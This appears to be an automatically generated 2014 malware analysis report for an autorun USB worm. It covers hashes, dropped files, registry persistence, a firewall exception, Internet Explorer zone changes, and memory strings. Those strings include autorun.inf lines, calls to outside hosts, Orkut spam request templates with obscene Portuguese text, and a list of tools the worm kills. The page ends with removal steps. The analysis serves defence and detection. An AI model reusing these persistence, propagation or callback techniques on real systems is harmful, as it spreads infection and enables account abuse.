Dropped.Generic.Malware.SFY.A8CEC62E_bead10d41a

by malwarelabrobot on August 29th, 2014 in Malware Descriptions.

Dropped:Generic.Malware.SFY.A8CEC62E (BitDefender), Worm:Win32/Autorun.ACL (Microsoft), not-a-virus:AdWare.Win32.RivalGame.kr (Kaspersky), Worm.Win32.AutoRun (VIPRE), Win32.HLLW.Autoruner1.15431 (DrWeb), Dropped:Generic.Malware.SFY.A8CEC62E (B) (Emsisoft), W32/Autorun.worm.aj (McAfee), W32.SillyFDC (Symantec), Virus.DestroyPC (Ikarus), Dropped:Generic.Malware.SFY.A8CEC62E (FSecure), Downloader.Banload.BQXZ (AVG), Win32:Agent-AMWP [Trj] (Avast), Mal_OtorunO (TrendMicro), Dropped:Generic.Malware.SFY.A8CEC62E (AdAware), Trojan.Win32.Swrort.4.FD, TrojanSwrort.YR, GenericAutorunWorm.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Virus, Adware, WormAutorun, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: bead10d41a7ea02fefb92eaa181c8822
SHA1: 64274d6003d9909b824487956a2e87cdea1ab261
SHA256: f8c6d353de75f8d80df76a86b4fe343677bf2777bc76d3e0c9c9853e99154532
SSDeep: 1536:JynMXC8ALeVRKkq6HnMohsxB9RPd5wYGQEP:7XC8ASOz6n9hsvPyQEP
Size: 71655 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MingWin32GCC3x, UPolyXv05_v6
Company: System Applet
Created at: 2010-11-27 04:03:18
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour: WormAutorun
Description: A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Dropped's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Dropped creates the following process(es):

%original file name%.exe:640

The Dropped injects its code into the following process(es):

dovq~.exe:1588

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process dovq~.exe:1588 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\WinPcap .exe (601 bytes)
%Program Files%\NetMeeting .exe (601 bytes)
%Program Files%\Microsoft Office .exe (601 bytes)
%Program Files%\Online Services .exe (601 bytes)
%WinDir%\Media .exe (601 bytes)
%Program Files%\xerox .exe (601 bytes)
%WinDir%\Connection Wizard .exe (601 bytes)
%Documents and Settings%\%current user%\My Documents\My Music .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark .exe (601 bytes)
%Program Files%\Internet Explorer .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware .exe (601 bytes)
%WinDir%\Offline Web Pages .exe (601 bytes)
%WinDir%\Cursors .exe (601 bytes)
%Program Files%\WinPcap .exe (601 bytes)
%WinDir%\AppPatch .exe (601 bytes)
%WinDir%\Resources .exe (601 bytes)
%WinDir%\ehome .exe (601 bytes)
%Program Files%\MSECache .exe (601 bytes)
%WinDir%\inf .exe (601 bytes)
%WinDir%\addins .exe (601 bytes)
%WinDir%\repair .exe (601 bytes)
%WinDir%\Driver Cache .exe (601 bytes)
%Program Files%\MSN .exe (601 bytes)
%WinDir%\Installer .exe (601 bytes)
%Program Files%\Common Files .exe (601 bytes)
%WinDir%\ime .exe (601 bytes)
%WinDir%\L2Schemas .exe (601 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures .exe (601 bytes)
%WinDir%\Provisioning .exe (601 bytes)
%Program Files%\Adobe .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602 .exe (601 bytes)
%Program Files%\Uninstall Information .exe (601 bytes)
%Program Files%\MSN Gaming Zone .exe (601 bytes)
%WinDir%\Prefetch .exe (601 bytes)
%Program Files%\Outlook Express .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games .exe (601 bytes)
%WinDir%\java .exe (601 bytes)
%WinDir%\assembly .exe (601 bytes)
%Program Files%\ComPlus Applications .exe (601 bytes)
%WinDir%\LastGood .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories .exe (601 bytes)
%WinDir%\Fonts .exe (601 bytes)
%WinDir%\PeerNet .exe (601 bytes)
%WinDir%\$hf_mig$ .exe (601 bytes)
%Program Files%\microsoft frontpage .exe (601 bytes)
%Program Files%\Microsoft.NET .exe (601 bytes)
%WinDir%\Debug .exe (601 bytes)
%WinDir%\Downloaded Program Files .exe (601 bytes)
%WinDir%\mui .exe (601 bytes)
%Program Files%\WindowsUpdate .exe (601 bytes)
%WinDir%\Registration .exe (601 bytes)
%Program Files%\Messenger .exe (601 bytes)
%WinDir%\Help .exe (601 bytes)
%WinDir%\msagent .exe (601 bytes)
%WinDir%\Config .exe (601 bytes)
%WinDir%\pchealth .exe (601 bytes)
%WinDir%\$NtUninstallKB898461$ .exe (601 bytes)
%Program Files%\Reference Assemblies .exe (601 bytes)
%Program Files%\Windows NT .exe (601 bytes)
%WinDir%\Microsoft.NET .exe (601 bytes)
%Program Files%\MSBuild .exe (601 bytes)
%WinDir%\Network Diagnostic .exe (601 bytes)
%WinDir%\msapps .exe (601 bytes)
%Program Files%\Movie Maker .exe (601 bytes)
%Program Files%\Windows Media Player .exe (601 bytes)
%WinDir%\$Reconfig$ .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup .exe (601 bytes)

The process %original file name%.exe:640 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\dovq~.exe (601 bytes)

Registry activity

The process dovq~.exe:1588 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A D3 D7 9C 29 E6 DF B6 44 2D BC 3A 99 26 0C 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt" = "1"
"ShowSuperHidden" = "0"

To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinC" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dovq~.exe"

Adds a rule to the Windows firewall which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"dovq~.exe" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dovq~.exe:*:Enabled:Windows Live 2010"

The process %original file name%.exe:640 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 44 DA 49 52 AB 01 B7 71 4A 1B 72 44 F0 BD 49"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"dovq~.exe" = "dovq~"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped modifies IE settings for security zones to map all local web nodes (hostnames without dots) that are not assigned to any other zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Dropped's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

No information is available.

PE Sections

Name   | Virtual Address | Virtual Size | Raw Size | Entropy  | Section MD5
.text  | 4096            | 22180        | 22528    | 3.91852  | fbf080ca7a58851eef48ac44d4dda8f4
.data  | 28672           | 96           | 512      | 0.393627 | 9c105f6483065ccd0b51d9010300e6d0
.rdata | 32768           | 3968         | 4096     | 3.79393  | d62ec91200a20acd2248bc901fc97f98
.bss   | 36864           | 2832         | 0        | 0        | d41d8cd98f00b204e9800998ecf8427e
.idata | 40960           | 2520         | 2560     | 3.21175  | 94689627520518124594c928f4c9fcdc
.rsrc  | 45056           | 90112        | 14848    | 2.7652   | eca87d8b1ffd0f1b8936371e56053693

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
575acdca6c86a3e75b50f978fd8e1c04
6c2f2b147f92fd26fe31ae43da408352

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Dropped connects to the servers at the following location(s):

Strings from Dumps

dovq~.exe_1588:

.text
.data
.rdata
@.bss
.idata
.rsrc
7ev7.eXe
dovq~.exe
VVV.orkut.com.br
%c%c%c
À%c
POST_TOKEN=%s&signature=%s&Action.submit=1&scrapText=%s&uid=%s
POST /Scrapbook.aspx HTTP/1.0
Host: VVV.orkut.com.br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: %d
Cookie: %s %s orkut_state=%s
POST_TOKEN=%s&signature=%s&Action.join=Enviar dados
POST /CommunityJoin?cmm=%s HTTP/1.0
Action.editUserStatusMessage=1&POST_TOKEN=%s&signature=%s&userStatus=%s
POST /Home.aspx HTTP/1.0
evnene.xp3.biz
GET /MYC/sv.php?s=%s HTTP/1.0
Host: %s
usuarios.multimania.es
GET /v77/MYC/sv.php?s=%s HTTP/1.0
v%sdi%s
put%s
prostitut%s
raparig%s
%s p%s%sa
%s rol%s
%s penis
%s pa%s
%s pint%s
%s %sara%so
me d%s essa %s b%snda gord%s%s%s do %sara%s%s
filho da put%s%svo comer %s c%s
%s%s%svo comer %s c%s
v%s comer %s c%s%sar%sombad%s%sdo %sara%s%s
vai d%s a %s bunda %s%svem %s%spa %s
v%sm %sup%s %s %s do %sara%so
vem me f%sd%s gosto%so%sesfrega %s na minha %sr%s
%sou uma %s msm%s e adoro d%sr meu rabo%s%s %s %s v%sm me %s?%s
%su so uma %s e adoro d%sr minh%s buceta e o meu %s%s%s%s quer?%s
%sd%soro %s%spa %s bem grande e gr%ssso.%s%svem gozar na minha %s
%suer%s %s com %s gosto%so%svem m%s f%sder agora%seu %s com muito tesao
%su confesso que sinto um tes%so incontrol%svel %s%s%s importa o tamanho, cor, espessura%s%s %s importa %s %s o ma%so seja bem tarado, e me de muito prazer %s%sbviamente %s irei retribuir
GET /Scrapbook.aspx HTTP/1.0
Cookie: orkut_state=%s
JSHDF['CGI.POST_TOKEN'] =
JSHDF['Page.signature.raw'] =
GET /RequestFriends.aspx?req=fl&uid=%s HTTP/1.0
Cookie: orkut_state=%s; %s %s
107561828
108525857
108607764
%s .exe
%sautorun.inf
open=ESPFOLDER.exe
shell\open\Command="ESPFOLDER.exe -e"
shell\explore\Command="ESPFOLDER.exe -e"
%sESPFOLDER.exe
cmd.exe
reg.exe
taskkill.exe
regedit.exe
msconfig.exe
rstrui.exe
Unlocker.exe
taskmgr.exe
@live.com
@yahoo.com
@hotmail.com
@gmail.com
@msn.com
VAI TOMA NO C%cU
TUA MÊE AQUELA VADIA
VOU COMER SEU C%cU
%s_%s
GET /v77/MYC/CT/sv.php?s=%s HTTP/1.0
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
%s:*:Enabled:Windows Live 2010
ESPFOLDER.exe
Explorer.exe
%s:%u: failed assertion `%s'
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dovq~.exe
RegCreateKeyA
ShellExecuteA
MapVirtualKeyA
keybd_event
ADVAPI32.DLL
KERNEL32.dll
msvcrt.dll
SHELL32.DLL
USER32.dll
WSOCK32.DLL


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:640

  2. Delete the original Dropped file.
  3. Delete or disinfect the following files created/modified by the Dropped:

    %Documents and Settings%\All Users\Start Menu\Programs\WinPcap .exe (601 bytes)
    %Program Files%\NetMeeting .exe (601 bytes)
    %Program Files%\Microsoft Office .exe (601 bytes)
    %Program Files%\Online Services .exe (601 bytes)
    %WinDir%\Media .exe (601 bytes)
    %Program Files%\xerox .exe (601 bytes)
    %WinDir%\Connection Wizard .exe (601 bytes)
    %Documents and Settings%\%current user%\My Documents\My Music .exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Wireshark .exe (601 bytes)
    %Program Files%\Internet Explorer .exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware .exe (601 bytes)
    %WinDir%\Offline Web Pages .exe (601 bytes)
    %WinDir%\Cursors .exe (601 bytes)
    %Program Files%\WinPcap .exe (601 bytes)
    %WinDir%\AppPatch .exe (601 bytes)
    %WinDir%\Resources .exe (601 bytes)
    %WinDir%\ehome .exe (601 bytes)
    %Program Files%\MSECache .exe (601 bytes)
    %WinDir%\inf .exe (601 bytes)
    %WinDir%\addins .exe (601 bytes)
    %WinDir%\repair .exe (601 bytes)
    %WinDir%\Driver Cache .exe (601 bytes)
    %Program Files%\MSN .exe (601 bytes)
    %WinDir%\Installer .exe (601 bytes)
    %Program Files%\Common Files .exe (601 bytes)
    %WinDir%\ime .exe (601 bytes)
    %WinDir%\L2Schemas .exe (601 bytes)
    %Documents and Settings%\%current user%\My Documents\My Pictures .exe (601 bytes)
    %WinDir%\Provisioning .exe (601 bytes)
    %Program Files%\Adobe .exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools .exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602 .exe (601 bytes)
    %Program Files%\Uninstall Information .exe (601 bytes)
    %Program Files%\MSN Gaming Zone .exe (601 bytes)
    %WinDir%\Prefetch .exe (601 bytes)
    %Program Files%\Outlook Express .exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Games .exe (601 bytes)
    %WinDir%\java .exe (601 bytes)
    %WinDir%\assembly .exe (601 bytes)
    %Program Files%\ComPlus Applications .exe (601 bytes)
    %WinDir%\LastGood .exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories .exe (601 bytes)
    %WinDir%\Fonts .exe (601 bytes)
    %WinDir%\PeerNet .exe (601 bytes)
    %WinDir%\$hf_mig$ .exe (601 bytes)
    %Program Files%\microsoft frontpage .exe (601 bytes)
    %Program Files%\Microsoft.NET .exe (601 bytes)
    %WinDir%\Debug .exe (601 bytes)
    %WinDir%\Downloaded Program Files .exe (601 bytes)
    %WinDir%\mui .exe (601 bytes)
    %Program Files%\WindowsUpdate .exe (601 bytes)
    %WinDir%\Registration .exe (601 bytes)
    %Program Files%\Messenger .exe (601 bytes)
    %WinDir%\Help .exe (601 bytes)
    %WinDir%\msagent .exe (601 bytes)
    %WinDir%\Config .exe (601 bytes)
    %WinDir%\pchealth .exe (601 bytes)
    %WinDir%\$NtUninstallKB898461$ .exe (601 bytes)
    %Program Files%\Reference Assemblies .exe (601 bytes)
    %Program Files%\Windows NT .exe (601 bytes)
    %WinDir%\Microsoft.NET .exe (601 bytes)
    %Program Files%\MSBuild .exe (601 bytes)
    %WinDir%\Network Diagnostic .exe (601 bytes)
    %WinDir%\msapps .exe (601 bytes)
    %Program Files%\Movie Maker .exe (601 bytes)
    %Program Files%\Windows Media Player .exe (601 bytes)
    %WinDir%\$Reconfig$ .exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup .exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\dovq~.exe (601 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WinC" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dovq~.exe"

  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
